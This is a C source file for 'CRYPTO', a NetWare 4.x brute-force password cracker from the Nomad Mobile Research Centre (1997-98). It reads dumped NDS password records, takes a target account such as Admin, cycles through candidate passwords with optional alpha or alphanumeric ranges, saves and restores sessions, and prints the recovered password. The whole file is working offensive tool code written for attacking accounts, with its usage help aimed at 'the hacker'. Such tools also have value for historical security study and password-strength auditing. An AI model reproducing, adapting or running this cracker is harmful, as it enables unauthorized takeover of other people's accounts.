/*************************************************************************
 *                                                                       *
 * crypto.c   - cracks one way encrypted passwords from NDS              *
 *                                                                       *
 * Programmer - Simple Nomad - Nomad Mobile Research Centre              *
 *              Crypto routines by itsme@xs4all.nl                       *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/6/97     - Initial Revision                                         *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/13/97    - Completed basic program.                                 *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/26/97    - Redid brute force attack. Cleaned up code.               *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/27/97    - Minor bug fixes to improve memory usage.                 *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/28/97    - Removed several old routines, minor bug fixes.           *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/29/97    - Fixed problem that crashed DOS windows under Win95, also *
 *              added big endian support.                                *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 2/4/98     - Added two sets of changes. First added a number of       *
 *              features suggested by Lackner <alackn01@fiu.edu>, and    *
 *              while it was very tempting, I could not integrate all    *
 *              due to other changes. Some of the Lackner changes        *
 *              included a number of look and feel changes, including    *
 *              using alternate file names for the password file, the    *
 *              restore file, and adding options to allow for alpha-only *
 *              alpha-numeric-only brute forces in addition to the       *
 *              entire range of possible characters. Also added was a    *
 *              sliding rule to specify start and stop words for the     *
 *              brute force. Some of the other changes conflicted with   *
 *              speed-saving changes.                                    *
 *                                                                       *
 *              The speed-saving changes by Jitsu-Disk are incredible.   *
 *              Massive speed increases (up to 19 times faster on        *
 *              Pentiums) have made full character brute forcing much    *
 *              more feasible. These changes are discussed in the        *
 *              updated "Inside NDS" document. Also, all of the crypto   *
 *              algorithm stuff has been moved to its own header file.   *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 2/18/98    - Made sure if a restore file is used, the same filename   *
 *              is used for saving. Added more Jitsu-Disk speed          *
 *              improvements. Cleaned up code somewhat, minor bug fixes. *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 3/10/98    - Minor code cleanup. Added -h switch for help screen.     *
 *                                                                       *
 *************************************************************************/

/*
 * Includes
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "globals.h"
#include "password.h"
#include "crypto.h"

#define DEF_FILE "RESTORE.PAN"
#define MAXCHAR 128

#ifdef ENDIAN
union
{
  uint32 longData;
  uint8 shortData[4];
} output;

union
{
  uint32 longData;
  uint8 shortData[4];
} input;
#endif

/*
 * This routine switches byte ordering to get around the big 
 * endian -- little endian problem. I did this because systems
 * like AIX offer no solutions for a big endian reading a little
 * endian created file. Send it a uint32 and it returns the 
 * converted uint32.
 */
#ifdef ENDIAN
uint32 make_conversion(uint32 k) {
  int i;
  uint32 j;
  
  input.longData=k;
  for (i=0; i<4; i++)
    output.shortData[i]=input.shortData[3-i];
  return(output.longData);
}
#endif

/*
 * This routine counts the number of PASSWORD.NDS records and returns the
 * value.
 */
long int countPasswordRecords(void)
{
   FILE *fPassword;
   long int j;
   uint32 k;
   ldiv_t calc;

   fPassword=fopen("PASSWORD.NDS","rb");
   if (fPassword==NULL)
   {
     printf("Unable to open PASSWORD.NDS\n");
     exit(1);
   }
   fseek(fPassword,334,SEEK_END);
   k=ftell(fPassword);
   calc=ldiv(k,334);
   j=calc.quot;
   fclose(fPassword);
   return(j);
}

/*
 * print usage if needed
 */
void printHelp(int j)
{
   printf("USAGE: crypto <options>\n");
   printf("  -a            ALPHA characters (A-Z) only.\n");
   printf("  -b            BOTH alpha and numeric (A-Z,0-9).\n");
   printf("  -f            FIRST password to try (cannot be used during restore)\n");
   printf("  -h            This HELP screen\n");
   printf("  -r            RESTORE a previous brute force attack.\n");
   printf("  -r <filename> RESTORE from the specified filename.\n");
   printf("  -s <filename> SAVE periodically to filename for later restore.\n");
   printf("  -u <username> Attack the USER specified (username is case sensitive).\n\n");
   printf("EXAMPLES:\n");
   printf("  crypto -r\n");
   printf("  crypto -u Admin\n\n");
   exit(j);
}

/*
 * This routine looks for a particular user. It is passed the total number
 * of users to look through and who to look for. If found, TRUE is returned.
 * FALSE is returned if the user was not found.
 */
int findEntryInPasswordFile(long int j, char *account)
{
   FILE *fPassword;
   int i,k,FOUND=FALSE;

   fPassword=fopen("PASSWORD.NDS","rb");
   if (fPassword==NULL)
   {
     printf("Unable to open PASSWORD.NDS\n");
     exit(1);
   }

   while(j!=0)
   {
     fread(&pPassword,334,1,fPassword);
     FOUND=TRUE;
     for (i=0;i<strlen(account);i++)
     {
       k=i*2+6;
       if (account[i]!=pPassword.userCN[k]) FOUND=FALSE;
     }
     if (FOUND==TRUE)
       break;
     j--;
   }
   fclose(fPassword);
   return(FOUND);
}

/*
 * Main prog
 */
int main(int argc, char *argv[])
{
   FILE *restoreTemp;
   uint8 buf[32];
   uint32 id;
   uint8 idtab[4];
   int i,k,l,t,save=FALSE,maxtry=66,restore=FALSE,first=FALSE,TEST=FALSE;
   long int j,counter=0;
   char *account,*firsttry,*restfile,*savefile;
   char try[16];
   int try_index[]={0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};
   unsigned short lengh,pos,turns,locat;

   account = (char *)calloc(1,sizeof(char)*MAXCHAR);
   firsttry = (char *)calloc(1,sizeof(char)*MAXCHAR);
   restfile = (char *)calloc(1,sizeof(char)*MAXCHAR);
   savefile = (char *)calloc(1,sizeof(char)*MAXCHAR);

   /* say hello... */
   printf("CRYPTO - Netware 4.x brute force password cracker\n");
   printf("Comments/bugs: pandora@nmrc.org\n");
   printf("http://www.nmrc.org/pandora\n");
   printf("1997,1998 (c) Nomad Mobile Research Centre\n\n");

   if (argc<2) printHelp(1);

   /* process the command line */
   for (i=1 ; i<argc ; i++)
   {
      if (argv[i][0]=='-')
	 switch(argv[i][1])
	 {
            case 'a':
            case 'A':
               maxtry=25;
               break;
            case 'b':
            case 'B':
               maxtry=35;
               break;
            case 'f':
            case 'F':
               first=TRUE;
               if ((i+1>argc) || (argv[i+1][0]=='-') || (argv[i+1]==NULL))
               {
                  printf("No argument given for option -r\n");
                  printHelp(1);
               }
               sprintf(firsttry,"%s",argv[i+1]);
               break;
            case 'r':
	    case 'R':
               restore=TRUE;
               if ((i+1>argc) || (argv[i+1][0]=='-') || (argv[i+1]==NULL))
               {
                  strcpy(restfile,DEF_FILE);
                  break;
               }
               sprintf(restfile,"%s",argv[i+1]);
	       break;
            case 's':
            case 'S':
               if ((i+1>argc) || (argv[i+1][0]=='-') || (argv[i+1]==NULL))
               {
                  printf("No argument given for option -s\n");
                  printHelp(1);
               }
               sprintf(savefile,"%s",argv[i+1]);
               save=TRUE;
               break;
	    case 'u':
	    case 'U':
               if ((i+1>argc) || argv[i+1][0]=='-' || (argv[i+1]==NULL))
	       {
		  printf("No argument given for option -u\n");
		  exit(1);
	       }
	       sprintf(account,"%s",argv[i+1]);
	       break;
	    case 'h':
	    case 'H':
	    case '?':
	       printHelp(0);
	    default:
	       printf("Invalid option: %s\n", argv[i]);
	       printHelp(1);
	 }
   }

  if(save==FALSE && restore==FALSE) sprintf(savefile,"%s",DEF_FILE);
  if(save==FALSE && restore==TRUE) sprintf(savefile,"%s",restfile);
  if(first==TRUE && restore==TRUE) 
  {
     printf("You cannot use -r and -f together.\n");
     printHelp(1);
  }

   /* if we aren't restoring a past brute force attack,
      we must find the user's info and set things up */
  if(restore==FALSE)
  {
    j=countPasswordRecords();
    if (!findEntryInPasswordFile(j,account))
    { 
      printf("%s not found in password file.\n",account);
      exit(1);
    }
    lengh=(short)pPassword.pwlen;
    if (first==TRUE)
    {
      if (lengh!=strlen(firsttry))
      {
        printf("%s is %d characters in length.\n",firsttry,lengh);
        exit(1);
      }
      for (i=0;i<lengh;i++) try[i]=firsttry[i];
      try[i]='\0';
      for (i=0;i<lengh;i++) 
      { 
        for (t=0;t<68;t++) 
          if (try[i]==data[t]) try_index[i]=t;
      } 
    }
    else
    {
      for (i=0;i<lengh;i++) 
      { 
        try[i]=data[0];
        try_index[i]=0;
      }
      try[i]='\0';
    }
    printf("Starting brute force...\n");
  }
   
   /* if restoring a past brute force attempt, read in where we
      left off, reset the try_index array, and start processing */
  else 
  {
    restoreTemp=fopen(restfile,"rb");
    if (restoreTemp==NULL) 
    { 
      printf("Unable to open %s\n",restfile);
      exit(1);
    }
    fread(&pPassword,334,1,restoreTemp);
    fgets(try,pPassword.pwlen+1,restoreTemp);
    fflush(restoreTemp);
    fclose(restoreTemp);
    #ifdef ENDIAN
      pPassword.objectID=make_conversion(pPassword.objectID);
    #endif
    lengh=(short)pPassword.pwlen;
    for (i=0;i<lengh;i++)
    { 
      for (t=0;t<68;t++)
        if (try[i]==data[t]) try_index[i]=t;
    }
    printUnicodeName(pPassword.userCN,258);
    printf("'s password brute force session restored.\n");
    printf("Last attempt - %s\nContinuing brute force...\n",try);
  }

  /* tell the hacker why the screen looks hung... */
  printf("Press CTRL-C or CTRL-BREAK to stop...\n");

  /* Initialize */
  id=pPassword.objectID;
  for(i=0;i<4;i++) idtab[i]=(uint8)(id>>(8*i));
  turns=preparepw(try,pPassword.pwlen,buf);
  /* turns is the number of time part of the passwd is repeated */
  xorwithid(id,(uint32 *)buf);
  i=0; do {crypt2data[i]=buf[i]; i++;} while (i<32); /*Yeah, I'm picky*/

  /* loop forever (or until success, the bitter end, or power failure) */
  while(1)
  {
    counter++;
    if (try[0]!='A') TEST=TRUE; /* TEST is initialized with FASLE */
    else if (TEST && try[0]=='A') break; /* We check if we accomplished a
                                         /* complete loop, passwd not found */
    if (counter==3000000) /* every !!!3,000,000!!! attempts save our place */
    { 
      counter=0;
      restoreTemp=fopen(savefile,"w+b");
      if (restoreTemp!=NULL)
      {
        fwrite(&pPassword,334,1,restoreTemp);
        fputs(try,restoreTemp);
        fflush(restoreTemp);
        fclose(restoreTemp);
      }
      else printf("\nUnable to open %s\n",savefile);
      #ifndef UNIX
      if (kbhit()); /* this must be here for MS-DOS to get in a ctrl-c */
      #endif
    }

    /* do the test... */
    if (encryptp()) break;
    /* if we got it, break the loop */
    /* We're testing all solutions, no need to test endless loop */
    /* increment our index so we know what the next attempt is */
    /* We're saving some time by only allocating the characters,
       the lenghten password bytes and the xored bytes,
       that are EFFECTIVELY modified each turn */
    i=0;
    while(i<lengh)
    {
      pos=lengh-i-1;
      if (try_index[pos] < maxtry)
      { 
        try_index[pos]++;
        try[pos]=data[try_index[pos]];
        for(k=0;k<turns;k++)
        {
          locat=pos+(lengh+1)*k;
          /* this little indian thing is driving me crazzzy */
          if (locat<32) crypt2data[locat]=try[pos]^idtab[locat&3];
        }
        break;
      }
      try_index[pos]=0;
      try[pos]=data[try_index[pos]];
      for(k=0;k<turns;k++)
      {
        locat=pos+(lengh+1)*k;
        if (locat<32) crypt2data[locat]=try[pos]^idtab[locat&3];
      }
      i++;
    };

  }

  /* now we are out of the loop */
  printf("\n");
  printUnicodeName(pPassword.userCN,258);

  if (TEST && try[0]=='A') printf("'s password not found.\n");
  else printf(" password is %s\n",try);
} 
